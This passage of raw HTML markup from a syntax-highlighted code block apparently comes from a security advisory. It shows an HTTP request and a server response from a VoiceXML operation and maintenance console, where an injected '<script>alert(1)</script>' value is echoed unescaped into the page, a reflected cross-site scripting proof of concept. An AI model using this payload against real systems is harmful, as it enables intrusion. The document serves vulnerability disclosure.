class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83604566033155-3\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/172.27.116.32:5443\/om\/call.do?action=trace_calls&amp;type=trace_calls<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83604566033155-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">GB<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83604566033155-5\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Trident<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">7.0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">11.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">like <\/span><span class=\"crayon-e\">Gecko<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83604566033155-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83604566033155-7\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">172.27.116.32<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">5443<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83604566033155-8\"><span class=\"crayon-v\">DNT<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83604566033155-9\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Alive<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83604566033155-10\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JSESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">5F9196107A3454133D4190CDB086E03B<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0023 seconds] -->  <\/p>\n<p>The server will respond with:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da83612622900865\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> HTTP\/1.1 200 OK  Server: Apache-Coyote\/1.1  Pragma: No-cache  Cache-Control: no-cache  Expires: Thu, 01 Dec 1994 16:00:00 GMT  Content-Type: text\/html;charset=ISO-8859-1  Content-Length: 2437  Date: Thu, 10 Sep 2015 13:32:55 GMT            &lt;HTML&gt;  &lt;HEAD&gt;  &lt;TITLE&gt;VoiceXML Environment Operation and Maintenance on tb0ocmp0&lt;\/TITLE&gt;  &lt;LINK REL=&#8221;stylesheet&#8221; HREF=&#8221;consolepages\/templates\/stylesheets\/style.css&#8221; TYPE=&#8221;text\/css&#8221;&gt;  &lt;\/HEAD&gt;    &lt;BODY&gt;   &lt;script type=&#8221;text\/javascript&#8221;&gt;    \/\/HV Menu v5- by Ger Versluis (www.burmees.nl)  \/\/Submitted to Dynamic Drive (www.dynamicdrive.com)  \/\/Visit www.dynamicdrive.com for this script and more    function Go(){return}    &lt;\/script&gt;  &lt;script type=&#8221;text\/javascript&#8221; src=&#8221;consolepages\/templates\/js\/exmplmenu_var.jsp&#8221;&gt;&lt;\/script&gt;  &lt;script type=&#8221;text\/javascript&#8221; src=&#8221;consolepages\/templates\/js\/menu_com.js&#8221;&gt;&lt;\/script&gt;  &lt;noscript&gt;Your browser does not support script&lt;\/noscript&gt;    &lt;TABLE WIDTH=&#8221;800&#8243; BORDER=&#8221;0&#8243;&gt;  &lt;TR&gt;  &lt;TD&gt;&lt;IMG SRC=&#8221;consolepages\/templates\/images\/speechweb.gif&#8221;\/&gt;&lt;\/TD&gt;  &lt;\/TR&gt;  &lt;TR&gt;    &lt;TD VALIGN=&#8221;top&#8221;&gt;  Logged on as: zerpsta1 &lt;SPAN id=&#8221;warn&#8221;&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;      &lt;\/SPAN&gt;  &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;              &lt;script language=&#8221;JavaScript&#8221;&gt;    function toggleVisibility( divId, buttonId ) {      if( document.all[divId].style.display == &#8216;none&#8217; ) {        document.all[divId].style.display = &#8216;inline&#8217;;        document.all[buttonId].value = &#8216;Hide Stacktrace&#8217;;      } else {        document.all[divId].style.display = &#8216;none&#8217;;        document.all[buttonId].value = &#8216;Show Stacktrace&#8217;;      }    }  &lt;\/script&gt;    &lt;br&gt;  &lt;b&gt;Active637a3&lt;script&gt;alert(1)&lt;\/script&gt;c7e9f&lt;\/b&gt;  &lt;br&gt;&lt;br&gt;      &lt;form action=&#8221;event.do&#8221;&gt;  &lt;input type=&#8221;submit&#8221; value=&#8221;Reset&#8221; name=&#8221;submit&#8221; onClick=&#8221;return confirm(&#8216;Are you sure you want to remove all Active637a3&lt;script&gt;alert(1)&lt;\/script&gt;c7e9f?&#8217;)&#8221;&gt;  &lt;input type=&#8221;hidden&#8221; name=&#8221;action&#8221; value=reset &gt;  &lt;input type=&#8221;hidden&#8221; name=&#8221;type&#8221; value=&#8221;Active637a3&lt;script&gt;alert(1)&lt;\/script&gt;c7e9f&#8221;&gt;  &lt;\/form&gt;  &lt;br&gt;&lt;br&gt;      &lt;table border=&#8221;1&#8243; width=&#8221;1200&#8243;&gt;  &lt;tr&gt;&lt;td colspan=&#8221;8&#8243; class=&#8221;tableheader&#8221;&gt;Events &lt;a href=&#8221;#&#8221;&gt;&lt;img src=&#8221;consolepages\/templates\/images\/questionmark.gif&#8221; border=&#8221;0&#8243; onClick=&#8221;window.open(&#8216;help.do?prompt=p21&#8217;, &#8216;help&#8217;, &#8216;toolbar=no,width=400,height=400,resizable=no,scrollbars=yes&#8217;);&#8221;&gt;&lt;\/a&gt;&lt;\/td&gt;&lt;\/tr&gt;  &lt;tr&gt;&lt;td colspan=&#8221;8&#8243;&gt;&amp;nbsp;&lt;\/td&gt;&lt;\/tr&gt;  &lt;tr&gt;  &lt;td&gt;&lt;b&gt;&lt;a href=event.do?action=sort&amp;type=NODE &gt;Server Id&lt;\/a&gt;&lt;\/b&gt;&lt;\/td&gt;  &lt;td&gt;&lt;b&gt;&lt;a href=event.do?action=sort&amp;type=TIME &gt;Date&lt;\/a&gt;&lt;\/b&gt;&lt;\/td&gt;  &lt;td&gt;&lt;b&gt;&lt;a href=event.do?action=sort&amp;type=CALL &gt;CallId&lt;\/a&gt;&lt;\/b&gt;&lt;\/td&gt;  &lt;td&gt;&lt;b&gt;CDR&lt;\/b&gt;&lt;\/td&gt;  &lt;td&gt;&lt;b&gt;Service Id&lt;\/b&gt;&lt;\/td&gt;  &lt;td&gt;&lt;b&gt;Message&lt;\/b&gt;&lt;\/td&gt;  &lt;\/tr&gt;    &lt;tr&gt;&lt;td colspan=&#8221;8&#8243;&gt;&amp;nbsp;&lt;\/td&gt;&lt;\/tr&gt;    &lt;tr&gt;&lt;td colspan=&#8221;8&#8243;&gt;No Items Found&lt;\/td&gt;&lt;\/tr&gt;    &lt;\/TD&gt;  &lt;\/TR&gt;  &lt;\/TABLE&gt;  &lt;\/BODY&gt;  &lt;\/HTML&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83612622900865-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83612622900865-93\">93<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-1\"><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">OK<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-2\"><span class=\"crayon-v\">Server<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Apache<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Coyote<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-3\"><span class=\"crayon-v\">Pragma<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">No<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">cache<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-4\"><span class=\"crayon-v\">Cache<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Control<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">no<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">cache<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-5\"><span class=\"crayon-v\">Expires<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Thu<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">01<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Dec<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1994<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-6\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">charset<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">ISO<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">8859<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-7\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2437<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-8\"><span class=\"crayon-v\">Date<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Thu<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Sep<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2015<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">32<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">55<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GMT<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-11\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-14\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">HTML<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-15\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">HEAD<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-16\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">TITLE<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">VoiceXML <\/span><span class=\"crayon-e\">Environment <\/span><span class=\"crayon-e\">Operation <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Maintenance <\/span><span class=\"crayon-e\">on <\/span><span class=\"crayon-v\">tb0ocmp0<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">TITLE<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-17\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">LINK <\/span><span class=\"crayon-v\">REL<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;stylesheet&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">HREF<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;consolepages\/templates\/stylesheets\/style.css&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">TYPE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;text\/css&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-18\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">HEAD<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-20\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">BODY<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-21\"><span class=\"crayon-ta\">&lt;script <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;text\/javascript&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-22\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-23\"><span class=\"crayon-c\">\/\/HV Menu v5- by Ger Versluis (www.burmees.nl)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-24\"><span class=\"crayon-c\">\/\/Submitted to Dynamic Drive (www.dynamicdrive.com)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-25\"><span class=\"crayon-c\">\/\/Visit www.dynamicdrive.com for this script and more<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-26\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-27\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Go<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 